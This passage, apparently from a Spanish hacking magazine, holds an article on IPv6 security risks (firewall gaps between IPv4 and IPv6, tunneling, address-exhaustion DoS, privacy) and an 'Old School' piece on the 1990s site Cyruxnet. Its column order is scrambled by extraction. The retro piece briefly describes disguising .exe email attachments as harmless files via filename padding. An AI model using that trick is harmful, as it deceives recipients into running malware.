actualmente en uso en su versión 4 desde 
1977 cuya capacidad de direccionamien-
to de 32 bits fue prevista desde 1995 que 
se agotaría en algún mediano plazo, lo 
cual oficialmente se reconoció ocurrió en 
2011, quedando solo unas cuantas direc-
ciones por repartir en los registros regio-
nales con un estimado de disponibilidad 
sólo para unos pocos años más.
Desde que se visualizó este escenario de 
incapacidad de soportar un crecimiento 
sostenido del acceso de nuevos usuarios 
y dispositivos al internet, se trabajó en la 
creación de una siguiente versión del pro-
tocolo IP el cuál estubo preparado para 
finales de los noventas, teniendo casi 
10 años de implementación y pruebas, 
siendo a partir del año 2005 cuando se 
impulsa de manera generalizada una ex-
hortación global a iniciar la transición al 
nuevo protocolo denominado Protocolo 
de Internet versión 6 IPv6.
En diversas partes del mundo se han to-
mado variados esfuerzos para facilitar o 
acelerar la transición al nuevo protocolo 
pero sin embargo, se espera que al me-
nos durante un periodo de 10 a 15 años 
se viva una experiencia bastante dispar 
en distintas regiones y distintos tipos de 
usuarios para adoptar o diseñar nuevas 
tecnologías compatibles con el nuevo 
protocolo, lo cual crea un escenario de 
seguridad peculiar para muchos debido 
a la varianza de preparativos adecuados 
y por el retraso en la implementación en 
comparación con la disponilidad y acceso 
a la nueva tecnología que ya se encuentra 
presente en diversos rubros de internet.
La transición al protocolo IPv6 se consi-
dera imperativa para todos, sin embargo 
muchos implementadores de tecnología y 
usuarios se encuentran con muy variantes 
grados de avance o retraso en los prepa-
rativos, creando una situación de riesgos 
de seguridad que no se ha visto desde 
que internet cambió del protocolo NCP a 
TCP/IP hace varias generaciones.
Casi todos los nuevos productos tecnológi-
cos en hardware y software con conectivi-
dad a internet vienen preparados de fábrica 
para usar el protocolo IPv6, y muchos de 
ellos vienen con el protocolo habilitado aún 
cuando no haya una conectividad completa 
por parte del ISP, o en caso del que el ISP 
ya ofrezca el servicio, que adicionalmente a 
la conectividad IPv4, se tengan dispositivos 
y servicios conectados por IPv6 sin que el 
usuario se de cuenta.
ANTE
CE
DEN
TES 
Disponibilidad 
inesperada
de IPv6
340.2
82.36
6.920
.938.
463.4
63.37
4.607
.431.7
68.21
1.456
riesgosde 
seguridad
enIPv6
Msc. Helios Mier
hmier@ieee.org
ri
es
go
s 
de
 s
eg
ur
id
ad
 e
n 
IP
V6
www.hackingmexico.mx 35
riesgos de seguridad en IPV6
www.hackingmexico.mx34
que la autonfiguración y parámetros 
de DHCP que tenga predeterminados 
de fábrica su equipo de red, se pueden 
tomar algunas deducciones para encon-
trar otros equipos de red en un segmen-
to perteneciente a un usuario.
El protocolo IPv6 integra de forma na-
tiva la facilidad para establecer canales 
y tuneles encubiertos de comunicación 
buscando seguridad y privacidad de las 
comunicaciones, así como también con-
tar con funciones de tunneling destinadas 
a ayudar a organizaciones a dar conecti-
vidad IPv6 durante su periodo de transi-
ción. Así también existen servicios públi-
cos gratuitos para ofrecer a un usuario la 
posibilidad de dar salida a un tunel IPv6 
desde su terminal.
Esto puede permitir se establezcan for-
mas de comunicación desde dentro de o 
hacia sitios restringidos externos a la red 
encapsulando protocolos entre paquetes 
IPv6 o usando tuneles de salida remotos 
aprovechando la omisión de controlar lo 
que entra y sale usando protocolo IPv6 
o algún protocolo de tuneleo como 6en4, 
6a4, teredo, etc.
IPv6 corrige algunos errores de dise-
ño de IPv4 que se traducian en vulne-
rabilidades de seguridad muy díficiles 
de enfrentar, para lo cual a lo largo del 
tiempo se desarrollaron estrategias y 
tecnologías que eran opcionales imple-
mentar, pero que al hacerlo se reducian 
en gran medida riesgos severos como el 
caso de IPsec.
Sin embargo, hay que recalcar que IPv6 
en sí no es un protocolo orientado a la se-
guridad, de manera que su implementa-
ción de ninguna manera elimina riesgos 
por lo que hay que entender y aplicar 
todas las nuevas características que in-
corpora para ayudar a mejorar el nivel de 
seguridad de una red.
Esta necesidad de conocer y aplicar las 
nuevas funcionalidades técnicas afectan 
a los servicios de red y sistemas a todos 
los niveles, desde la arquitectura y fun-
ciones importantes de las redes de comu-
nicaciones, la configuración de servicios 
en clientes y servidores, y en particular 
a los sistemas que se desarrollan ya que 
si bien pudieran funcionar de forma com-
patible con IPv6 gracias al modelo de ca-
pas, es posible que se introduzcan nuevos 
bugs y vulnerabilidades sólo por el hecho 
de convivir en un ambiente con ambos 
protocolos habilitados y por depender de 
mecanismos de protección externos ba-
Tuneleo ycanales
furtivos Tecnologíay servicios
inpreparados
Esto obliga que los planes y políticas de 
seguridad sean revisadas con prontitud 
para contemplar los riesgos de ya con-
tar con la presencia del protocolo IPv6 
y establecer mecanismos de seguridad 
adecuados para que lo regulen o en su 
defecto asegurarse de anular por el mo-
mento su presencia para reducir riesgos 
como los siguientes que mencionaremos.
IPv6 funciona de una manera distinta a 
IPv4, de forma que deben de tratarse como 
dos elementos aparte aunque se encuentren 
presentes en un mismo sistema, lo cual se 
espera que sea la situación predominante 
durante el periodo de transición hasta que 
la necesidad de contar aún con servicios a 
través de IPv4 sea abandonada.
Los mecanismos de protección que se 
basen en alguna forma de control o refe-
rencia por direccionamiento IPv4 no ten-
drán una funcionalidad idéntica si se rea-
lizan comunicaciones por IPv6, siendo el 
ejemplo más evidente el de los firewalls 
por ejemplo en un sistema unix/linux, 
donde IPtables funciona por separado de 
su contraparte IP6tables.
El origen o destino de una comunicación 
que se requiere sea regulada no será igual 
si se realiza por IPv6, aún cuando los ser-
vicios en capas superiores de OSI sean 
por protocolos conocidos, se podrían evi-
tar los mecanismos de protección simple-
mente con buscar el acceso a traves de 
una dirección IPv6.
Si bien no será lo indicado suprimir el 
protocolo IPv6 de un sistema, los ad-
ministradores tienen que aprender a 
considerar duplicar los mecanismos de 
protección para que se apliquen con la 
misma efectividad a todo lo que venga 
sobre IPv6.
Todo sistema y servicio que funcione 
con IPv6 se debe de considerar que se 
encuentra con acceso directo y público a 
internet, de manera que se requiere ase-
gurarse que se cuenta con firewall de red 
o al menos con un firewall personal en 
cada sistema.
Aún cuando físicamente se tenga una red 
local y se manejen servicios locales, se 
debe de tener siempre presente que con 
una dirección IPv6 se encuentra uno de 
frente al internet público, y por lo tanto al 
alcance de cualquier agente externo.
Si bien a cada usuario se le delegará 
un segmento IPv6 con considerable 
cantidad de direcciones para disponer 
de ellas, dependiendo de la forma en 
Convivencia 
simultánea 
de múltiples 
protocolos
Acceso
directo
por IPv6
riesgos de seguridad en IPV6
ri
es
go
s 
de
 s
eg
ur
id
ad
 e
n 
IP
V6
www.hackingmexico.mx 37www.hackingmexico.mx36
implicaciones en cuanto a privacidad y 
registrabilidad.
Como en todo producto tecnológico de 
creación reciente, apenas está por iniciar 
su etapa de evaluación a gran escala por 
parte de los usuarios y entusiastas que la 
hackean hasta llevarla a sus límites, de 
manera que se tienen que tener durante 
un largo tiempo la expectativa del des-
cubrimiento de vulnerabilidades en el 
diseño del nuevo protocolo así como de 
las implementaciones de este en todos los 
productos comerciales que se usen.
Una parte considerable de riesgos de 
seguridad asociados a IPv6 proviene de 
desinteresarse de su ya presencia actual 
y no ver reflejada su consideración en los 
planes y políticas de seguridad.
Siendo una tecnología relativamente nue-
va, se debe de tener preparación adecuada 
para su aplicación práctica y resolución de 
incidentes, siendo para muchos un área de 
expertise que tienen que desarrollar con 
urgencia debido a que antes de que se den 
cuenta ya estarán viendose en la necesidad 
de implementar servicios públicos de red 
por medio de este protocolo.
Tecnología 
naciente y 
vulnerabilidades 
por descubrir
Con
clu
sio
nes
sados exclusivamente en lo que se puede 
lograr con IPv4.
En pocas palabras, el diseño de la arquitec-
tura de seguridad de un sistema tiene que 
contemplar que eventualmente funcionará 
también sobre redes y servidores con so-
porte IPv6 y las pruebas de calidad y segu-
ridad del sistema deben de incluir casos de 
prueba contemplando el mismo escenario.
Debido a que el protocolo IPv6 contem-
pla 128 bits para designar el direcciona-
miento, se espera que a cada usuario y red 
local se le delegen una enorme cantidad 
de direcciones IP para su uso a discreción 
del administrador del segmento.
Estas increibles cantidades de direccio-
nes que se ponen sobre la mesa a partir 
de este momento, puede llegar a generar 
una situación de negación de servicio 
para dispositivos de red o sistemas que 
levantan registros de las direcciones IP’s 
ya que al existir tantas, si por coinciden-
cia o maliciosamente se ingresan en una 
red paquetes IP que lleven al limite las 
bitácoras y memorias internas de los dis-
positivos que no serían capaces de alma-
cenar tanta cantidad de registros.
De hecho este tipo de vulnerabilidad ha 
sido de las primeras que han sido docu-
mentadas y se comienza a descubrir se 
encuentra presente en muchos productos 
comerciales y sistemas de redes con IPv6 
listo. [] http://www.networkworld.com/
news/2011/050311-microsoft-juniper-
ipv6.html
Si bien la cantidad de direcciones IP dis-
ponible es inmensa, una combinación de 
funcionalidad técnica y políticas admi-
nistrativas crean un escenario donde cada 
dirección IP pudiera llegar a quedar atada 
a una persona en particular:
Las funcionalidades comunes de DHCP 
que logran en muchos casos asignar 
siempre una misma dirección al mismo 
dispositivo.
Uno de los modos de autoconfiguración por 
default en muchos routers donde se toma la 
dirección MAC del dispositivo para con-
formar la dirección IPv6 que se le asignará. 
Si se omite habilitar el modo de privacidad 
para la autoconfiguración y ofuscación de 
la dirección IP usada por el dispositivo.
Las políticas de cada NIC regional don-
de se asignan bloques de direcciones IP 
en base a una localización geográfica por 
país, carrier, ISP, estado, región o ciudad.
Es esperado en algún momento que cada 
usuario y dispositivo llegue a tener una 
dirección IPv6 fija de forma permanente, 
de manera que tiene que considerarse las 
Saturación
de recursos
Geolocalización 
y personalización 
de direcciones
www.hackingmexico.mx 39
ri
es
go
s 
de
 s
eg
ur
id
ad
 e
n 
IP
V6
www.hackingmexico.mx38
riesgos de seguridad en IPV6
A
qui recordaremos 
con nostalgia los 
viejos tiempos, 
las técnicas 
usadas, y eventos 
importantes que ocurrieron en el 
mundo del hack.
En esta ocasión hablaremos de 
Cyruxnet, un portal informatico 
que existio en los años 90’s 
donde se publicaron por primera 
vez técnicas exclusivas, tales 
como ocultamiento de .exe’s en 
mensajes de Outlook express, lo 
cual consistía en agregar el valor 
ASCII del espacio en blanco al 
nombre del archivo después de la 
extensión para hacerlo pasar por 
un archivo inofensivo.
Algo asi de sencillo, lograba 
que cuando vieras el archivo 
adjunto en tu correo, pensaras que 
se trataba de una foto, pero en 
realidad era un ejecutable.
También fue de los primeros 
sitios en publicar códigos de 
esteganografía para ocultar código 
malicioso dentro de fotos u otros 
archivos. Un gran recurso de bugs 
y exploits de la época, cuando la 
información de este tipo era un 
poco mas difícil de conseguir.
Old S
ch
o
o
l
Cyruxnet, 
un portal 
informatico que 
existio en los 
años 90’s donde 
se publicaron 
por primera 
vez técnicas 
exclusivas, 
tales como 
ocultamiento de 
.exe’s
www.hackingmexico.mx 41
s
e
c
c
i
o
n
 
o
 
a
r
t
i
c
u
l
o
www.hackingmexico.mx
old school
40
i n f o r m e s 5 5 1 0 6 8 8 8 0 9
i n f o @ h a c k i n g m e x i c o . m x
I N T E G R A T E C O N N O S O T R O S
U N E T E A N U E S T R O E Q U I P O D E C O L A B O R A D O R E S
www.hackingmexico.mx42
seccion o articulo
#01
A quién le es llamado un Hacker
El manifiesto Hacker 
Facebook: Explotando al ser humano
Vulnerabilidad de Mikrotik Http Proxy
NAVEGACIÓN ANONIMA
Hacking Microsft C#
Hackintosh: jailbreak IOS

Continuar navegando